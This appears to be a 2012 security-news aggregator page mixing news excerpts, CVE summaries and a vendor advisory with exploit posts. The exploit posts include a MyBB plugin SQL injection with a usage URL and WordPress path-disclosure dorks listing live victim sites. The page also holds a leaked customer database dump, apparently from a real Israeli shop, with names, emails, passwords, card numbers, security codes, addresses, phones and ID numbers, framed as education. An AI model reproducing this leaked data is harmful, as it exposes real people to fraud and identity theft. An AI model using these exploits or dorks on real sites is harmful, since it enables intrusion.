2012 was an "exciting" year for OS X security—at least if you're a security expert or researcher. There were plenty of events to keep people on their toes. Although Apple took some egg on the face for some of them, overall, the company came out ahead when it came down to keeping users safe.

At least that's the opinion of some security researchers who followed OS X developments throughout the year.

Back to the Flashback

Remember Flashback? That malware first made its way onto the Mac in 2011, but never became widespread enough for most users to even become aware of it—until earlier this year. Suddenly, Apple was faced with arguably the first truly high-profile malware to appear on OS X, right as Apple was appearing more than ever in the media.

The incident sparked plenty of hemming and hawing about the end of "security through obscurity" for Apple. Researchers and pundits alike argued that Apple's continued popularity could only lead to more attacks on security, whether they occur on iOS or the Mac. Indeed, it's hard to deny that malicious attacks on Mac users are increasing in frequency, and Apple did take some flak for talking a big security game for so long while simultaneously leaving open a Java hole for two whole months after it was first patched by Oracle.

read more....http://arstechnica.com/apple/2012/12/where-os-x-security-stands-after-a-volatile-2012/

# Exploit Title: AwayList MyBB plugin SQLi 0day
# Exploit Author: Red_Hat [Team Vect0r]
# Software Link: http://mods.mybb.com/view/awaylist
# Tested on: Windows & Linux.


Vulnerable code :

<?php
$query = $db->simple_select( // 245
        "awaylist", '*', "id = '" . $mybb->input['id'] . "'" // 246
    ); // 247
    $item = $db->fetch_array($query); // 248
?>

The variable '$mybb->input['id']' remains unsanitized.

Usage : http://server/index.php?action=editAwlItem&id=[SQLi]

Shoutout to Zixem <3 & Team Vect0r :3




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

# Exploit Title: Wordpress Themes- shotzz Full Path Disclosure vulnerability
# Author: The Black Devils
# Category : [ webapps ]
# Type : php
# Tested on: [Windows] & [Ubuntu]
#------------------
Dork:inurl:"wp-content/themes/shotzz"

Demo
http://jcfridays.com/wp-content/themes/shotzz/
http://reflectionsonretirement.com/wp-content/themes/shotzz/
http://emprendodanza.com/wp-content/themes/shotzz/


#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------





//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

# Exploit Title: Wordpress Themes- yvora Full Path Disclosure vulnerability
# Author: The Black Devils
# Category : [ webapps ]
# Type : php
# Tested on: [Windows] & [Ubuntu]
#------------------

################### Wordpress Themes- yvora Full Path Disclosure ###################
Dork:inurl:"wp-content/themes/yvora"

Demo
http://spocomtaiwan.com/wp-content/themes/yvora/index.php
http://epeknights.com/santabarbara/wp-content/themes/yvora/index.php
http://askyvi.com/wp-content/themes/yvora/index.php
http://www.zagi-eventi.hr/wp-content/themes/yvora/index.php

#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

# Exploit Title: Wordpress Themes- vithy Full Path Disclosure vulnerability
# Author: The Black Devils
# Category : [ webapps ]
# Type : php
# Tested on: [Windows] & [Ubuntu]
#------------------


Dork:inurl:"wp-content/themes/vithy"

Demo
http://www.volunteerincambodia.org/wordpress/wp-content/themes/vithy/index.php
http://stylistemaroc.com/wp-content/themes/vithy/index.php
http://www.modul-dance.eu/wp-content/themes/vithy/index.php
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

# Exploit Title: Wordpress Themes- appius Full Path Disclosure vulnerability
# Author: The Black Devils
# Category : [ webapps ]
# Type : php
# Tested on: [Windows] & [Ubuntu]
#------------------
Dork:inurl:"wp-content/themes/appius"

Demo
http://sinerxlab.com/maria/wp-content/themes/appius/index.php
http://www.barebilhar.com.br/wp-content/themes/appius/index.php
http://misserised.com/wp-content/themes/appius/index.php

#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Newly released files show a secret National Security Agency program is targeting the computerized systems that control utilities to discover security vulnerabilities, which can be used to defend the United States or disrupt the infrastructure of other nations.

The NSA's so-called Perfect Citizen program conducts "vulnerability exploration and research" against the computerized controllers that control "large-scale" utilities including power grids and natural gas pipelines, the documents show. The program is scheduled to continue through at least September 2014.

The Perfect Citizen files obtained by the Electronic Privacy Information Center and provided to CNET shed more light on how the agency aims to defend -- and attack -- embedded controllers. The NSA is reported to have developed Stuxnet, which President Obama secretly ordered to be used against Iran's nuclear program, with the help of Israel.

read more............http://news.cnet.com/8301-1023_3-57560644-93/revealed-nsa-targeting-domestic-computer-systems-in-secret-test/

About 5 months ago I have released the first version of Pythonect - a new, experimental, general-purpose high-level dataflow programming language based on Python, written in Python.
It aims to combine the intuitive feel of shell scripting (and all of its perks like implicit parallelism) with the flexibility and agility of Python.

Crazy? Most definitely. And yet, strangely enough, it works!

Pythonect, being a dataflow programming language, treats data as something that originates from a source, flows through a number of processing components, and arrives at some final destination.
As such, it is most suitable for creating applications that are themselves focused on the "flow" of data. Perhaps the most readily available example of a dataflow-oriented applications comes from the realm of real-time signal processing, e.g. a video signal processor which perhaps starts with a video input, modifies it through a number of processing components (video filters), and finally outputs it to a video display.

As with video, malware analysis can be expressed as a network of different components such as: disassemblers, regular expressions, debuggers and etc. that are connected by a number of communication channels.
The benefits, and perhaps the greatest incentives, of expressing malware analysis this way is scalability and parallelism. The different components in the network can be maneuvered to create entirely unique dataflows without necessarily requiring the relationship to be hardcoded. Also, the design and concept of components make it easier to run on distributed systems and parallel processors.

In this tutorial I will show you how to automate static malware analysis using Pythonect. The examples will be simple enough that you can extend them if you want to.
Before you read this tutorial you should have at least a basic knowledge of x86 Assembly, Python, and Pythonect (I recommend reading the Pythonect Tutorial: Learn By Example).

Note: I have decided to go with static malware analysis because it's easier to demonstrate, and to use open source tools because they are more accessible. Nonetheless, this does not go to show that Pythonect or dataflow programming cannot be used to automate dynamic malware analysis, or integrated with a commercial software. The only limit is your imagination.

There isn't exactly a "Hello, world" program in the malware analysis realm, so I will start with my equivalent to "Hello, world", an example program that computes a MD5 digest of a file:

read more..............http://blog.ikotler.org/2012/08/automated-static-malware-analysis-with.html

It appears my words sometimes go unnoticed. As always this information is for education purposes. We show these compromised systems so that you understand the current threat environment that surrounds us everyday and how significant it is to take the appropriate countermeasures to safeguard your critical data no matter what size your organization is as well as your individual data driven devices. Below is POC of the Israeli DB compromise .Again as always be proactive not reactive in safeguarding your critical data and stay safe out there. Subsequently as you are aware this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures such as those described in ISO13335 to prevent yourselves from becoming victims in the current threat environment,
The Breach is provided below as I will continue to monitor the net to safeguard systems and individuals critical data. Additionally this information is provided to our readers as an addendum to the California Database Security Breach Act.
Status: We have tried to notify the company of the breach but the site does not appear to be accepting our entry. If anyone is in Israel Please contact this sites admin in order to protect those who have been compromised as soon as possible. If this data gets in the wrong hands innocent people could be significantly impacted. Thank you and have a merry Christmas, Happy Hanukkah and very blessed new year.




[this information have been leaked by [Anonymous Leaker] for more leaked help us to rish 1000 fans in

our official page : www.facebook.com/Anonymous.Leaker thanks for support .. enjoy


Expect us




Target :  http://www.yasam.co.il

Login Page : https://montage2.altserver.com/~yasam/admin/login.php

web application technology: Nginx, PHP 5.2.17

back-end DBMS: MySQL 5.0

Database: yasam_main ===>
[9 tables]
+-------------+
| article     |
| cat_article |
| category    |
| customer    |
| destest     |
| items       |
| lang        |
| orders      |
| producer    |
+-------------+

Database: yasam_main
Table: customer  =============> This Table For Credit Cards >< <>
[19 columns]
+--------------------+--------------+
| Column             | Type         |
+--------------------+--------------+
| Address            | tinyblob     |
| Card_Number        | varchar(21)  |
| Card_Security_Code | varchar(4)   |
| City               | tinyblob     |
| Comments           | tinyblob     |
| email              | varchar(100) |
| expmonth           | varchar(2)   |
| expyear            | varchar(4)   |
| ICard              | varchar(10)  |
| id                 | int(10)      |
| Mobile             | varchar(20)  |
| Name               | tinyblob     |
| office_Comments    | tinyblob     |
| pass               | varchar(20)  |
| Payment_method     | varchar(16)  |
| Phone              | varchar(20)  |
| status             | tinyint(1)   |
| VAT                | tinyint(1)   |
| Zip                | varchar(10)  |
+--------------------+--------------+

Database: yasam_main                              
Table: customer
[8 entries]
+-----------------------+                  
| email                 |
+-----------------------+
| igalb12@walla.co.il   |
| iz00@bezeqint.net     |
| meshrox2@bezeqint.net |
| urielas@gmail.com     |
| yoni@hostov.com       |
| yoni@hostov6.com      |
| yoni@rivyon.com       |
| yrrs@yahoo.com        |
+-----------------------+

Database: yasam_main
Table: customer
[8 entries]
+----------+
| pass     |
+----------+
| 00000    |
| 123456   |
| 123456   |
| 123456   |
| 123456   |
| 2729???? |
| 312299   |
| pneygola |
+----------+

Database: yasam_main
Table: customer
[8 entries]
+-----------------------+
| Card_Number           |
+-----------------------+
| 375510290602916       |
| 375516093250357       |
| 4111111111111111      |
| 4111111111111111      |
| 4111111111111111      |
| 45678779              |
| 5326100351982917      |
| 541111111111111111111 |
+-----------------------+
Database: yasam_main
Table: customer
[8 entries]
+--------------------+
| Card_Security_Code |
+--------------------+
| NULL               |
| 3232               |
| 3232               |
| 360                |
| 4343               |
| 4545               |
| 546                |
| 725                |
+--------------------+

Database: yasam_main
Table: customer
[8 entries]
+-------------+
| City        |
+-------------+
| ירושלים     |
| ירושלים     |
| ירושלים     |
| ירושלים     |
| ירושלים     |
| קרית מוצקין |
| ראש-פינה    |
| תל אביב     |
+-------------+

Database: yasam_main
Table: customer
[8 entries]
+----------------------+
| Address              |
+----------------------+
| המאירי אביגדור 17/29 |
| יד שרה               |
| מעלות דפנה           |
| מעלות דפנה           |
| מעלות דפנה           |
| מעלות דפנה 18        |
| רחוב הפרחים 3        |
| ת.ד 1083             |
+----------------------+

Database: yasam_main
Table: customer
[8 entries]
+---------------+
| Name          |
+---------------+
| אשר אוריאל    |
| יגאל ביזיניאן |
| יוני רוטנברג  |
| יוני רוטנברג  |
| יוני רוטנברג  |
| יוני רוטנברג2 |
| יעקב ראובני   |
| משולם  דרוקמן |
+---------------+

Database: yasam_main
Table: customer
[8 entries]
+---------+
| expyear |
+---------+
| 2011    |
| 2012    |
| 2012    |
| 2012    |
| 2012    |
| 2014    |
| 2014    |
| 2014    |
+---------+

Database: yasam_main
Table: customer
[8 entries]
+------------+
| Phone      |
+------------+
| 02-5323647 |
| 02-5323647 |
| 02-5323647 |
| 02-5323647 |
| 02-5554444 |
| 036447637  |
| 04-693425  |
| 04-8706948 |
+------------+

Database: yasam_main
Table: customer
[8 entries]
+----------+
| expmonth |
+----------+
| 02       |
| 03       |
| 03       |
| 05       |
| 06       |
| 09       |
| 09       |
| 11       |
+----------+


Database: yasam_main
Table: customer
[8 entries]
+-------+
| Zip   |
+-------+
| NULL  |
| NULL  |
| NULL  |
| 12000 |
| 54    |
| 69413 |
| 96675 |
| 97450 |
+-------+

Database: yasam_main
Table: customer
[8 entries]
+------------+
| ICard      |
+------------+
| NULL       |
| NULL       |
| NULL       |
| 000178921  |
| 001696905  |
| 0123456798 |
| 0238671210 |
| 35076456   |
+------------+

Database: yasam_main
Table: customer
[8 entries]
+-------------+
| Mobile      |
+-------------+
| NULL        |
| NULL        |
| NULL        |
| 050-0500505 |
| 052-3315820 |
| 052-6076022 |
| 054-2868786 |
| 0544324141  |
+-------------+




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Click on the underlined CVE for additional vuln specific info

CVE-2012-5932

Summary: Eval injection vulnerability in the ldapagnt_eval function in ldapagnt.dll in unifid.exe in NetIQ Privileged User Manager 2.3.x before 2.3.1 HF2 allows remote attackers to execute arbitrary Perl code via a crafted application/x-amf request.

Published: 12/24/2012

CVE-2012-5931

Summary: Directory traversal vulnerability in the set_log_config function in regclnt.dll in unifid.exe in NetIQ Privileged User Manager 2.3.x before 2.3.1 HF2 allows remote authenticated users to create or overwrite arbitrary files via directory traversal sequences in a log pathname.

Published: 12/24/2012

CVE-2012-5930

Summary: The pa_modify_accounts function in auth.dll in unifid.exe in NetIQ Privileged User Manager 2.3.x before 2.3.1 HF2 does not require authentication for the modifyAccounts method, which allows remote attackers to change the passwords of administrative accounts via a crafted application/x-amf request.

Published: 12/24/2012

CVE-2012-4046

Summary: The D-Link DCS-932L camera with firmware 1.02 allows remote attackers to discover the password via a UDP broadcast packet, as demonstrated by running the D-Link Setup Wizard and reading the _paramR["P"] value.

Published: 12/24/2012

CVE-2012-0411

Summary: Unspecified vulnerability in Novell iPrint Client before 5.82 allows remote attackers to execute arbitrary code via an op-client-interface-version action.

Published: 12/24/2012

CVE-2012-6428

• http://www.us-cert.gov/control_systems/pdf/ICSA-12-354-02.pdf

Summary: Carlo Gavazzi EOS-Box with firmware before 1.0.0.1080_2.1.10 establishes multiple hardcoded accounts, which makes it easier for remote attackers to obtain administrative access by reading a password in a PHP script, a similar issue to CVE-2012-5862.

Published: 12/23/2012

CVSS Severity: 10.0 (HIGH)

CVE-2012-6427

• http://www.us-cert.gov/control_systems/pdf/ICSA-12-354-02.pdf

Summary: Multiple SQL injection vulnerabilities in Carlo Gavazzi EOS-Box with firmware before 1.0.0.1080_2.1.10 allow remote attackers to execute arbitrary SQL commands via unspecified vectors, a similar issue to CVE-2012-5861.

Published: 12/23/2012

CVSS Severity: 7.5 (HIGH)

CVE-2012-4698

• http://www.us-cert.gov/control_systems/pdf/ICSA-12-354-01.pdf

Summary: Siemens RuggedCom Rugged Operating System (ROS) before 3.12, ROX I OS through 1.14.5, ROX II OS through 2.3.0, and RuggedMax OS through 4.2.1.4621.22 use hardcoded private keys for SSL and SSH communication, which makes it easier for man-in-the-middle attackers to spoof servers and decrypt network traffic by leveraging the availability of these keys within ROS files at all customer installations.

Published: 12/23/2012

CVSS Severity: 4.3 (MEDIUM)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ESA-2012-060: EMC Data Protection Advisor Information Disclosure Vulnerability.

EMC Identifier: ESA-2012-060

CVE Identifier: CVE-2012-4616



Severity Rating: CVSS v2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)



Affected Products:

EMC Data Protection Advisor 5.6, 5.6 SP1
EMC Data Protection Advisor 5.7, 5.7 SP1
EMC Data Protection Advisor 5.8, 5.8 SP1, 5.8 SP2, 5.8 SP3, 5.8 SP4



Summary:

A vulnerability exists in EMC Data Protection Advisor that can be potentially exploited to gain unauthorized access to files and directories.


Details:

The DPA Web UI contains directory traversal vulnerability that could allow a remote unauthenticated malicious user to copy and read files from the affected system. The vulnerability does not allow an attacker to modify existing or upload new files to the affected system. If recommended practice is followed and the DPA server processes run as an unprivileged user, these files will be limited to the DPA installation directory. The DPA installation directory may contain files with sensitive system information.

Resolution:

The following EMC Data Protection Advisor products contain a resolution to this issue:

EMC Data Protection Advisor 5.6, 5.6 SP1 (Patch DPA-21068)
EMC Data Protection Advisor 5.7, 5.7 SP1 (Patch DPA-21068)
EMC Data Protection Advisor 5.8, 5.8 SP1, 5.8 SP2, 5.8 SP3, 5.8 SP4 (Patch DPA-21068)

The DPA server processes will need to be shut down to allow the patch to be applied.

EMC strongly recommends all customers apply the relevant patches at the earliest opportunity.




Link to Remedies:

Registered EMC Powerlink customers can download software from:

Online support https://support.emc.com/downloads/829_Data-Protection-Advisor
Powerlink http://powerlink.emc.com/, navigate to Home > Support > Software Downloads and Licensing > Downloads D > Data Protection Advisor


Credits:

EMC would like to thank Andrea Micalizzi (aka rgod) working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue.


Read and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867.

Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045.

For an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.

EMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.

EMC Product Security Response Center

Security_Alert () EMC COM

http://www.emc.com/contact-us/contact/product-security-response-center.html
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (Cygwin)

iEYEARECAAYFAlDTdHwACgkQtjd2rKp+ALxv4ACgkLWVRd8KP1bp25ZGN1BI4Qcp
s3cAoKSh6U11U2wsP3VgzqSRYRT1LWrn
=3vXU
-----END PGP SIGNATURE-----